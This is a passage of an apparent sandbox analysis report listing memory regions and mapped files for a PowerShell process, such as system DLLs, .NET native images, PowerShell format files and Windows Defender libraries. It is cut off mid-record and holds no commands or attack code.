"\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P6f792626#\\524b452ef8345675c9bb9ebc18f2dba0\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.p6f792626#\\524b452ef8345675c9bb9ebc18f2dba0\\microsoft.powershell.security.ni.dll") Region: id = 3251 start_va = 0x7ffaa9f00000 end_va = 0x7ffaa9f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f00000" filename = "" Region: id = 3256 start_va = 0x7ffb13090000 end_va = 0x7ffb1309bfff monitored = 0 entry_point = 0x7ffb130935c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 3257 start_va = 0x7ffb24da0000 end_va = 0x7ffb24dccfff monitored = 0 entry_point = 0x7ffb24db9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3262 start_va = 0x1a630000 end_va = 0x1a72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a630000" filename = "" Region: id = 3265 start_va = 0x6f0000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 3270 start_va = 0x6f0000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 3275 start_va = 0x7ffaa9f10000 end_va = 0x7ffaa9f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f10000" filename = "" Region: id = 3284 start_va = 0x7ffaa9f20000 end_va = 0x7ffaa9f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f20000" filename = "" Region: id = 3299 start_va = 0x7ffaa9f30000 end_va = 0x7ffaa9f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f30000" filename = "" Region: id = 3306 start_va = 0x7ffb0dfd0000 end_va = 0x7ffb0e0effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Configuration\\7ad6bc6ee277d5eed690e8c1c9400ff7\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.configuration\\7ad6bc6ee277d5eed690e8c1c9400ff7\\system.configuration.ni.dll") Region: id = 3319 start_va = 0x7ffb1b040000 end_va = 0x7ffb1b04bfff monitored = 0 entry_point = 0x7ffb1b0418b0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 3320 start_va = 0x7ffb253c0000 end_va = 0x7ffb25586fff monitored = 0 entry_point = 0x7ffb2541db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3321 start_va = 0x7ffb251a0000 end_va = 0x7ffb251affff monitored = 0 entry_point = 0x7ffb251a56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3322 start_va = 0x7ffb25ea0000 end_va = 0x7ffb25ef4fff monitored = 0 entry_point = 0x7ffb25eb7970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 3324 start_va = 0x6f0000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 3325 start_va = 0x1a730000 end_va = 0x1a7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a730000" filename = "" Region: id = 3327 start_va = 0x1a7b0000 end_va = 0x1a7c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001a7b0000" filename = "" Region: id = 3330 start_va = 0x700000 end_va = 0x703fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "certificate.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml") Region: id = 3331 start_va = 0x1a7d0000 end_va = 0x1a84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a7d0000" filename = "" Region: id = 3337 start_va = 0x1a850000 end_va = 0x1aa4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a850000" filename = "" Region: id = 3342 start_va = 0x7ffb24120000 end_va = 0x7ffb24143fff monitored = 0 entry_point = 0x7ffb24123260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 3347 start_va = 0x1aa50000 end_va = 0x1ae4afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001aa50000" filename = "" Region: id = 3348 start_va = 0x700000 end_va = 0x703fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "certificate.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml") Region: id = 3353 start_va = 0x1ae50000 end_va = 0x1ae77fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 3366 start_va = 0x1ae50000 end_va = 0x1ae71fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dotnettypes.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml") Region: id = 3367 start_va = 0x1ae50000 end_va = 0x1ae71fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dotnettypes.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml") Region: id = 3368 start_va = 0x1ae50000 end_va = 0x1ae77fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 3373 start_va = 0x700000 end_va = 0x706fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "filesystem.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml") Region: id = 3374 start_va = 0x1ae50000 end_va = 0x1ae77fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 3379 start_va = 0x1ae50000 end_va = 0x1ae94fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "help.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml") Region: id = 3380 start_va = 0x1ae50000 end_va = 0x1ae94fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "help.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml") Region: id = 3381 start_va = 0x1ae50000 end_va = 0x1ae77fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 3386 start_va = 0x1ae50000 end_va = 0x1ae83fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "helpv3.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\helpv3.format.ps1xml") Region: id = 3387 start_va = 0x1ae50000 end_va = 0x1ae77fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 3392 start_va = 0x1ae50000 end_va = 0x1ae82fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershellcore.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml") Region: id = 3393 start_va = 0x1ae50000 end_va = 0x1ae77fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 3398 start_va = 0x700000 end_va = 0x701fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershelltrace.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml") Region: id = 3399 start_va = 0x1ae50000 end_va = 0x1ae77fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 3400 start_va = 0x700000 end_va = 0x702fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "registry.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml") Region: id = 3401 start_va = 0x700000 end_va = 0x702fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "registry.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml") Region: id = 3402 start_va = 0x1ae50000 end_va = 0x1ae77fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 3411 start_va = 0x700000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 3412 start_va = 0x1a410000 end_va = 0x1a41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a410000" filename = "" Region: id = 3417 start_va = 0x1ae50000 end_va = 0x1b7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ae50000" filename = "" Region: id = 3418 start_va = 0x7ffb23aa0000 end_va = 0x7ffb23b35fff monitored = 0 entry_point = 0x7ffb23ac5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 3419 start_va = 0x1b7e0000 end_va = 0x1b8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b7e0000" filename = "" Region: id = 3425 start_va = 0x1b8c0000 end_va = 0x1b99cfff monitored = 0 entry_point = 0x1b91e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 3431 start_va = 0x1b7e0000 end_va = 0x1b85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b7e0000" filename = "" Region: id = 3432 start_va = 0x1b8b0000 end_va = 0x1b8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8b0000" filename = "" Region: id = 3433 start_va = 0x1b8c0000 end_va = 0x1b93ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8c0000" filename = "" Region: id = 3434 start_va = 0x1b940000 end_va = 0x1b9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b940000" filename = "" Region: id = 3442 start_va = 0x7ffb1cb80000 end_va = 0x7ffb1cb8ffff monitored = 0 entry_point = 0x7ffb1cb851b0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\System32\\amsi.dll" (normalized: "c:\\windows\\system32\\amsi.dll") Region: id = 3444 start_va = 0x700000 end_va = 0x700fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 3445 start_va = 0x7ffb266b0000 end_va = 0x7ffb26756fff monitored = 0 entry_point = 0x7ffb266bb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3446 start_va = 0x1a410000 end_va = 0x1a410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001a410000" filename = "" Region: id = 3447 start_va = 0x7ffb1cb60000 end_va = 0x7ffb1cb7cfff monitored = 0 entry_point = 0x7ffb1cb6e930 region_type = mapped_file name = "mpoav.dll" filename = "\\Program Files\\Windows Defender\\MpOAV.dll" (normalized: "c:\\program files\\windows defender\\mpoav.dll") Region: id = 3453 start_va = 0x7ffb0de70000 end_va = 0x7ffb0df4efff monitored = 0 entry_point = 0x7ffb0dea4ef0 region_type = mapped_file name = "mpclient.dll" filename = "\\Program Files\\Windows Defender\\MpClient.dll" (normalized: "c:\\program files\\windows defender\\mpclient.dll") Region: id = 3454 start_va = 0x1b860000 end_va = 0x1b861fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msmplics.dll" filename = "\\Program Files\\Windows Defender\\MsMpLics.dll" (normalized: "c:\\program files\\windows defender\\msmplics.dll") Region: id = 3455 start_va = 0x1b9c0000 end_va = 0x1babffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b9c0000" filename = "" Region: id = 3456 start_va = 0x7ffb24880000 end_va = 0x7ffb2489efff monitored = 0 entry_point = 0x7ffb24885d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 3462 start_va = 0x1b860000 end_va = 0x1b88dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001b860000" filename = "" Region: id = 3463 start_va = 0x1bac0000 end_va = 0x1bb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bac0000" filename = "" Region: id = 3464 start_va = 0x1bb40000 end_va = 0x1bb7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 3469 start_va = 0x7ffaa9f40000 end_va = 0x7ffaa9f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f40000" filename = "" Region: id = 3470 start_va = 0x7ffaa9f50000 end_va = 0x7ffaa9f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f50000" filename = "" Region: id = 3475 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 3516 start_va = 0x7ffb03d90000 end_va = 0x7ffb040c0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.runtime.serialization.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Runteb92aa12#\\340cf313b8da7e43376ee98292cc61e7\\System.Runtime.Serialization.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.runteb92aa12#\\340cf313b8da7e43376ee98292cc61e7\\system.runtime.serialization.ni.dll") Region: id = 3518 start_va = 0x7ffb1c950000 end_va = 0x7ffb1c974fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "smdiagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\SMDiagnostics\\3aa7da61075c3a19976503e08685ea9c\\SMDiagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\smdiagnostics\\3aa7da61075c3a19976503e08685ea9c\\smdiagnostics.ni.dll") Region: id = 3522 start_va = 0x7ffb0ac50000 end_va = 0x7ffb0ad41fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.servicemodel.internals.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Servd1dec626#\\d9557b4b0aa51aa795c37cc322226be5\\System.ServiceModel.Internals.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.servd1dec626#\\d9557b4b0aa51aa795c37cc322226be5\\system.servicemodel.internals.ni.dll") Region: id = 3536 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 3540 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 3541 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 3542 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 3543 start_va = 0x1bb60000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb60000" filename = "" Region: id = 3548 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 3550 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 3568 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 3569 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 3570 start_va = 0x1bb60000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb60000" filename = "" Region: id = 3592 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 3593 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 3594 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 3615 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 3634 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 3635 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 3636 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 3637 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 3657 start_va = 0x1bb60000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb60000" filename = "" Region: id = 3677 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 3678 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 3679 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 3742 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 3743 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 3744 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 3757 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 3771 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 3772 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 3788 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 3789 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 3827 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 3869 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 3887 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 3888 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 3908 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 3909 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 3926 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 3927 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 3928 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 3930 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 4066 start_va = 0x1bb80000 end_va = 0x1bbbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb80000" filename = "" Region: id = 4067 start_va = 0x1bbc0000 end_va = 0x1bc3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bbc0000" filename = "" Region: id = 4068 start_va = 0x1b890000 end_va = 0x1b890fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psd1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1") Region: id = 4111 start_va = 0x1bb40000 end_va = 0x1bb67fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 4130 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 4189 start_va = 0x7ffaa9f60000 end_va = 0x7ffaa9f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f60000" filename = "" Region: id = 4310 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 4311 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 4312 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 4313 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 4314 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 4336 start_va = 0x1bb60000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb60000" filename = "" Region: id = 4337 start_va = 0x1bb70000 end_va = 0x1bb7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb70000" filename = "" Region: id = 4338 start_va = 0x1bc40000 end_va = 0x1bc4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bc40000" filename = "" Region: id = 4339 start_va = 0x1bc50000 end_va = 0x1bc5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bc50000" filename = "" Region: id = 4340 start_va = 0x1bc60000 end_va = 0x1bc6ffff monitored = 1 entry_point = 0x0 region_type = 